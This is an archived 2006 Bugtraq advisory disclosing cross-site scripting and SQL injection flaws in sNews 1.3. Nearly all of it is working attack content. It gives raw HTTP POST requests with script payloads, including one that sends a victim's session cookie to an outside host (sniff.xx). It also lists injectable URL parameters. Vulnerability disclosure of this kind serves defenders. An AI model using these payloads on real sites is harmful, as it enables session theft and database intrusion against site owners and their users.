| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: 5 Jul 2006 14:58:41 -0000 From: securityconnection@...il.com To: bugtraq@...urityfocus.com Subject: sNews 1.3 XSS SQL sNews 1.3 http://snews.solucija.com -------------------------- Cross Site Scripting (XSS) -------------------------- POST http://target.xx:80/index.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded Host: target.xx Content-Length: 88 pojam=<script>alert(/EllipsisSecurityTest/)</script>&search=search --- POST http://target.xx:80/index.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded Host: target.xx Content-Length: 130 text=1&name=1&id="><script>alert(/EllipsisSecurityTest/)</script>&commentspage=1&comment=test --- POST http://target.xx/index.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded Host: target.xx Content-Length: 130 pojam=&text=%3Cscript%3Eimg+%3D+new+Image%28%29%3B+img.src+%3D+%22http%3A%2F%2Ftarget.xx%2Fsniff%2Fs.gif%3F%22%2Bdocument.cookie%3B%3C%2Fscript%3E&name=Ellipsis+Test&id=1&commentspage=1&comment=%D0%9E%D1%82%D0%BF%D1%80%D0%B0%D0%B2%D0%B8%D1%82%D1%8C <script>img = new Image(); img.src = "http://sniff.xx/s.gif?"+document.cookie;</script> ------------- SQL injection ------------- http://target.xx/index.php?id='[SQL] http://target.xx/index.php?category='[SQL] http://target.xx/index.php?PHPSESSID=&id=[SQL] http://target.xx/index.php?id=1'[SQL]&commentspage=1 ----------------- Ellipsis Security http://www.ellsec.org
Powered by blists - more mailing lists